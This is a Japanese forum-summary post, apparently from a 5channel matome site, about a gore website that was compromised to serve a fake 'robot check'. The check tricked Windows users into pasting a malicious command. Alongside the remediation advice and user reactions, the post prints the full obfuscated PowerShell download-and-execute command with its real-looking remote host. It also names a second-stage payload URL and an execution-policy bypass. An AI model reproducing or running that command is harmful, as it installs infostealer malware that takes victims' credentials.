これ普通にマルウェアかかってる人多そう
【緊急速報】ポッカキットさん、不正アクセスによる乗っ取りでマルウェア感染源に…グロ愛好家のPCが多数死亡との被害
【🚨緊急速報🚨】あの「ポッカキット」がマルウェア感染源に?!お前らのPC、マジで大丈夫か?
1: 以下、5ちゃんねるからVIPがお送りします 2025/06/23(月) 08:36:34.488
何が起きたのか?その概要と被害範囲
ポッカキット運営事務局からの報告によると、以下の内容が判明している。
- 発生日時: 2025年6月23日(月)午前4:00頃 ~ 午後3:00頃
- 影響範囲: ポッカキットサイト内の一部の投稿ページ
- 被害内容: 上記時間帯に、該当ページに外部の不正なサーバーへ誘導するスクリプトが埋め込まれていた。
この期間に、改ざんされたページをWindows搭載のパソコンで閲覧し、画面に表示された偽の警告メッセージなどの指示に従って以下の操作を完了してしまった場合、マルウェアをダウンロード・実行させられた恐れがある。
- Win + Rキーで「ファイル名を指定して実行」を開く
- Ctrl + Vキーでクリップボードにコピーされた文字列を貼り付ける
- Enterキーで実行する
※スマートフォン(iPhone・Android)やMacユーザーは、現時点では実害は確認されていないとのことだ。
もしかして俺も!?対象となる可能性のあるユーザーはここを確認!
ポッカキット運営事務局は、以下の条件に該当するユーザーにPCの確認を強く呼びかけている。
- 2025年6月23日(月)午前4:00 ~ 午後3:00頃に、ポッカキットをWindowsパソコンから閲覧した人
- 上記時間帯のアクセス時に、偽の警告画面が表示されたり、意図しないファイルのダウンロードが発生したりした記憶のある人
- PC内に
dns.pdfや、通常とは異なる場所(例:ダウンロードフォルダ、デスクトップなど)にcsrss.exeなど、見覚えのないファイルが保存された記憶のある人
一つでも当てはまるなら、すぐに次の「お客様へのお願いと推奨されるご対応」に進んでくれ!
今すぐ行動しろ!不安な場合はこの対応を推奨!
もし自分のPCが対象になるかもしれない、と少しでも不安を感じたら、以下の対応を速やかに実行することが強く推奨されている。
- ウイルス対策ソフトによるフルスキャン: お使いのウイルス対策ソフト(Microsoft Defender、ウイルスバスター、ノートン、Malwarebytesなど)を最新の状態に更新した上で、PC全体をスキャン(フルスキャン)して、マルウェアが潜んでいないか徹底的に調べよう。
- 不審なファイルの確認: PC内に
csrss.exeやdns.pdfといった見覚えのないファイルが存在しないか確認すること。特にcsrss.exeはシステムの重要なファイルだが、ダウンロードフォルダやデスクトップなど、通常とは異なる場所に存在する場合はマルウェアである可能性が高い。 - システムの復元: もしマルウェア感染が強く疑われるなら、Windowsの「システムの復元」機能を使って、問題が発生する前の安全な時点にPCの状態を戻すことで、症状が改善する場合がある。
- 専門家へのご相談: 不審な動作が続く、自分で対処するのが難しいと感じる場合は、PCの初期化や、お近くのPC修理業者、セキュリティ専門家への相談を真剣に検討してくれ。
ポッカキット運営の対応状況と今後の誓い
今回の事態を受け、ポッカキット運営事務局は迅速な対応を行っている。
- 改ざんされたページの特定と、不審なスクリプトの完全削除を完了済み。
- サーバー全体の脆弱性スキャンとセキュリティ強化対策を継続中。
- 攻撃経路の特定調査、およびJPCERT/CC(日本コンピュータセキュリティインシデント対応チーム)、ホスティング事業者へのインシデント報告を進行中。
- 監視体制の強化と、定期的なセキュリティチェック体制の導入を完了済み。
運営事務局は「今後は、より一層のセキュリティ対策強化と監視体制の徹底に努め、再発防止に全力を尽くしてまいる所存でございます」と表明している。
長年お世話になってる人もいるだろう、あのエログロサイトの金字塔**「ポッカキット」が、なんとマルウェア感染サイトに変貌している**との衝撃情報が飛び込んできたぞ。SNSや掲示板では既に阿鼻叫喚、お前らの大事なPCやスマホが危ないかもしれない。
一体何が起きてるんだ?
ポッカキットのサイトにアクセスすると、突然「ロボット認証」を装った怪しい画面が表示されるらしい。ここで指示に従って操作してしまうと、あなたのPCに悪質なプログラム、つまりマルウェアが勝手にインストールされる仕組みになっているんだ。
特にヤバいのは、このマルウェアがPowerShellというWindowsの強力な機能を使って、外部からスクリプトをダウンロードし、「csrss.exe」というWindowsの正規プロセス名を偽装した実行ファイルを隠れて動かす点だ。これによって、あなたの個人情報(ID、パスワード、クレジットカード情報など)がごっそり盗まれる「インフォスティーラー」系の被害に遭う可能性が指摘されている。
具体的にどんな手口で感染させるんだ?
スレッド内で共有された情報によると、その手口はかなり巧妙だ。
- サイトにアクセスすると、ロボット認証画面が表示される。
- この画面で変な操作を要求され、指示に従うと、PowerShellの危険なコマンドがクリップボードにコピーされる。
- そのコマンドがこれだ!
powershell -No"P"ro"f"ile -w h -C"o"mmand "iex (iwr -Uri 'https://s4m";ed"solu"t"ions.c"om/jh"bbnmo"ihub"njmo.txt' -Us"e"Basi"cPa"rs"i"ng)";
- そのコマンドがこれだ!
- さらに「Windowsキー + R」で「powershell」を開き、「Ctrl + V」でクリップボードのコマンドを貼り付け、エンターを押すように誘導される。
こんな面倒なこと、普通の人間ならやらないと思うだろ?だが、焦ってしまったり、よくわからないまま指示に従ってしまうと、マジでヤバいことになる。
「見ただけ」じゃダメなのか?感染してるかどうかの確認は?
安心しろ。現時点の情報では、サイトを「開いただけ」で即座に感染することはないようだ。あくまで、誘導されるままにPowerShellコマンドを実行してしまった場合に感染する。
「自分は大丈夫かな?」と心配になったら、以下の点を確認してみよう。
- 指示されたPowerShellのコマンドを自分で実行してしまったか? もし実行してしまった場合は、即座に対応が必要だ。
- 最近PCの動作がおかしい、重くなったと感じるか?
- 身に覚えのない請求や、ログイン履歴がないか?
もし感染してしまったら、どうすればいい?
万が一、指示に従ってコマンドを実行してしまった場合は、今すぐ以下の対応をとってくれ!
- ネットワークから切断する:LANケーブルを抜くか、Wi-Fiを切断して、インターネットから隔離しよう。
- ウイルス対策ソフトでフルスキャンする:最新の状態にアップデートしたウイルス対策ソフトで、PC全体をスキャンしてマルウェアを検出し、駆除しよう。
- パスワードを変更する:念のため、重要なサイト(銀行、SNS、メールなど)のパスワードは、別の安全なデバイスから変更しておこう。
- 専門家に相談する:もし被害が疑われる場合や、自分で対処できないと感じたら、迷わずPC修理業者やセキュリティの専門家に相談することをお勧めする。最悪の場合、OSの再インストールも視野に入れる必要があるかもしれない。
今後の対策と注意点
今回の件は、アダルトサイトに限らず、どんなサイトでも罠が仕掛けられている可能性があることを改めて教えてくれた。
- 怪しいポップアップや指示には絶対に従わないこと。
- 身に覚えのないファイルやプログラムは絶対に実行しないこと。
- OSやセキュリティソフトは常に最新の状態に保つこと。
- PowerShellのような強力なツールを安易に使うのは避けること。
今回の件で、お前らのPCが乗っ取られたり、大事な情報が抜き取られたりすることがないよう、くれぐれも注意してくれよな!
2: 以下、5ちゃんねるからVIPがお送りします 2025/06/23(月) 08:37:11.828
マジかよww見に行こ
3: 以下、5ちゃんねるからVIPがお送りします 2025/06/23(月) 08:38:01.520
それでロボット操作窓でてたのか
あれ引っかかるやついないだろ
あれ引っかかるやついないだろ
4: 以下、5ちゃんねるからVIPがお送りします 2025/06/23(月) 08:39:30.383
最近エロ動画収集の担当バイト募集してたけどそれに関係あるのかな
5: 以下、5ちゃんねるからVIPがお送りします 2025/06/23(月) 08:43:49.951
esetに弾かれたわ
6: 以下、5ちゃんねるからVIPがお送りします 2025/06/23(月) 09:15:39.211
コマンド入力したらアウト…?
スレッドは、エログロサイト「ポッカキット」が乗っ取られ、アクセスするとマルウェアをインストールさせる仕組みになっているという情報について議論しています。
以下に議論の要点をまとめます。
マルウェアの仕組みと危険性:
- サイトを開くと特定の操作(ロボット認証に見せかけたもの)を要求され、それに従うとマルウェアがインストールされる。
- 具体的な手法として、PowerShellの
Invoke-Expression(iex) とInvoke-WebRequest(iwr) を用いて、リモートのスクリプト(s4medsolutions.com/jhbbnmoihubnjmo.txt)をダウンロードし、実行させる。 - ダウンロードされるスクリプトは、さらに別の悪意のあるファイル(例:
www.halittlelliglu.com/dns.pdfと見せかけたcsrss.exe)をダウンロードし、隠しプロセスとして実行させる。 - PowerShellの実行ポリシーを一時的にバイパスする
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Forceも使われている。 - これにより、ユーザーのID、パスワード、クレジットカード情報などが盗まれる「インフォスティーラー」系のマルウェアである可能性が指摘されている。
ユーザーの反応と懸念:
- サイトを開くだけで感染するのか、指示に従わないと大丈夫なのかといった疑問が多く挙がっている。
- 多くの意見は「指示に従ってPowerShellコマンドを実行しない限りは感染しない」という見方を示しているが、一部では「開くだけでアウト」と誤解しているユーザーもいる。
- Clipboardにコマンドがコピーされ、それをユーザーに貼り付けさせて実行させるという手口の巧妙さが指摘されている。
- 「高齢ネトウヨの巣窟」「グロ好きの弱者男性大敗北」など、サイトの利用者層を揶揄するコメントも散見される。
- 「踏み台にされて警察が来る」といった二次被害の懸念も示されている。
その他:
- マルウェアのコードの一部が貼られ、その危険性が解説されている。
- スクリプトに文法ミスや不完全な構文が含まれており、意図的に自動解析を避けるための「壊れた」構文である可能性も指摘されている。
- なぜエログロサイトにウイルスが集まるのかという疑問も挙がっている。
全体的に、今回の乗っ取りはユーザーの心理を巧みに利用した、比較的巧妙な手口のマルウェア攻撃であると認識されています。
難読化と隠蔽: コマンド内の不自然な引用符や、ウィンドウを非表示にするオプション(-w h)は、セキュリティソフトウェアによる検知を避け、ユーザーに気づかれずに動作させるための手法です。
不明なURLからのダウンロードと即時実行: 見慣れないウェブサイトからファイルをダウンロードし、その内容を直接スクリプトとして実行(iex)しようとします。これはマルウェア感染や情報窃取によく使われる手口です。
リスクと推奨事項
このコマンドを実行すると、コンピューターがウイルスに感染したり、個人情報が盗まれたりする深刻な被害を受ける可能性があります。